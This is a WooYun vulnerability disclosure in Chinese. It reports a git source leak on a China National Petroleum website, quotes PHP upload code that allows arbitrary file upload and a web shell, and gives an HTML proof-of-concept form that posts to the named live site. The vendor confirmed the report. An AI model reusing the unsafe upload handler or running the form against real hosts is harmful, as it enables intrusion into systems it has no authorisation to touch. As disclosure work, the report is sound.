当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089350

漏洞标题:中石油某站源码重构到GetShell

相关厂商:中国石油天然气集团公司

漏洞作者: 杀器王子

提交时间:2014-12-30 15:46

修复时间:2015-02-13 15:48

公开时间:2015-02-13 15:48

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-30: 细节已通知厂商并且等待厂商处理中
2014-12-31: 厂商已经确认,细节仅向厂商公开
2015-01-10: 细节向核心白帽子及相关领域专家公开
2015-01-20: 细节向普通白帽子公开
2015-01-30: 细节向实习白帽子公开
2015-02-13: 细节向公众公开

简要描述:

中石油某站源码重构到getshell

详细说明:

1.85.51.141存在git源码泄露
对应域名
http://mtp.cnpc.com.cn

Snip20141230_14.png


Snip20141230_13.png


Snip20141230_15.png


漏洞证明:

审计代码
/resources/data/appstore/appOperate.php
31行开始

if ($act == 'uploadFile') {
	if(!is_dir("../../files/appfiles")){  //如果不存在该文件夹
		mkdir("../../files/appfiles", 0777);  //创建文件夹
		chmod("../../files/appfiles", 0777);  //改变文件模式
	}
	// 上传app文件 appFileName
	$appname = $_FILES ['appFileName'] ['name'];
	$mktime = time ();
	// 创建文件夹
	$mkfile = '../../files/appfiles/' . $mktime . '/';
	mkdir ( $mkfile, 0777 );
	
	// $optionDir = '/mdm/www/resources/files/appfiles/'.$mktime;
	
	// exec('chmod 0777 '.$optionDir);
	
	$rand = $mktime . substr ( $appname, strrpos ( $appname, "." ) );
	$destination = $mkfile . $rand;
	
	$_SESSION ['filepath'] = $mktime;
	$_SESSION ['filename'] = $rand;
	
	if (move_uploaded_file ( $_FILES ['appFileName'] ['tmp_name'], $destination )) {
		$arr = array (
				'success' => true,
				'filename' => $rand,
				'localname' => $appname 
		);
	} else {
		$arr = array (
				'success' => false,
				'reason' => $destination 
		);
	}	
	echo json_encode ( $arr );


任意文件上传
form

<form method="post" action="http://mtp.cnpc.com.cn/resources/data/appstore/appOperate.php" enctype="multipart/form-data">
  <input name="appFileName" type="file" />
  <input name="action" type="text" value="uploadFile"/>
  <input name="submit" type="submit" />
</form>


Snip20141230_16.png

修复方案:

删除git

版权声明:转载请注明来源 杀器王子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-12-31 12:57

厂商回复:

感谢

最新状态:

暂无